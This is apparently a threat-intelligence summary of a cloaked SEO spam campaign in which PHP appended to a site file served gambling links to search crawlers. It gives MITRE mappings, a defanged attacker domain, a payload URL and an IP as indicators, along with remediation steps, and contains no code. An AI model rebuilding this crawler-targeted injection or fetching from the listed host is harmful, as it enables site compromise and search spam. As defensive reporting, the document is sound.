A professional-grade SEO cloaking campaign turned a legitimate site into a double agent by serving normal content to human visitors while delivering gambling spam to search-engine crawlers. The attack used the domain fugthatshit[.]baby and a remote payload (hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt) served from IP 104.21.50.131; recommended remediation includes removing the injected pages/index/IndexHandler.php, blocklisting the domain/IP, auditing users, resetting credentials, and deploying a WAF. #fugthatshit_baby #SitusToto
Keypoints
- The campaign is an SEO cloaking attack that shows spam to search-engine bots while hiding it from regular visitors.
- Malicious code was appended to a legitimate file: pages/index/IndexHandler.php, making the modification hard to spot.
- The attackers fetched spam content remotely from fugthatshit[.]baby (payload at hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt) using a cURL-based function.
- The script detects crawlers by checking User-Agent strings (Googlebot, Bingbot, Baiduspider) and only injects spam for bots.
- The site’s SEO and domain reputation are at risk of manual penalties or blacklist actions by search engines if cloaking is detected.
- Recommended remediation: remove malicious files, audit and remove suspicious users, reset credentials, scan endpoints, monitor outgoing traffic, update software, and deploy a WAF.
MITRE Techniques
- [T1588.002 ] Acquire Infrastructure: Domains – Attackers registered and used the domain fugthatshit[.]baby to host spam content and payloads (‘The malicious domain involved was: fugthatshit[.]baby’).
- [T1105 ] Ingress Tool Transfer – The server retrieved an external payload file (kindipublisher.txt) from the attacker’s host to inject spam (‘The payload was hosted at: hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt’).
- [T1071.001 ] Application Layer Protocol: Web Protocols – The malware used a cURL-based function to fetch remote spam content over HTTP(S) (‘uses a function called fetchContentCurl to grab the latest “Situs Toto” links from an attacker-controlled server at fugthatshit[.]baby’).
- [T1036.005 ] Masquerading: Match Legitimate Name – Malicious PHP was appended to an otherwise legitimate file (pages/index/IndexHandler.php) to hide its presence from developers (‘The malware was embedded inside a legitimate file pages/index/IndexHandler.php… additional PHP code was appended’).
- [T1027 ] Obfuscated Files or Information – The appended code and retrieval behavior concealed malicious functionality within normal application logic to avoid detection (‘The file appeared normal at first glance and contained real application logic. However, at the bottom of the file, additional PHP code was appended.’).
Indicators of Compromise
- [Domain ] malicious content host – fugthatshit[.]baby
- [URL ] remote payload delivering spam – hxxps://fugthatshit[.]baby/desktop/kindipublisher.txt
- [IP address ] hosting/blocklist candidate – 104.21.50.131
- [File name / path ] infected application file – pages/index/IndexHandler.php; payload file kindipublisher.txt
Read more: https://blog.sucuri.net/2026/01/google-sees-spam-you-see-your-site-a-cloaked-seo-spam-attack.html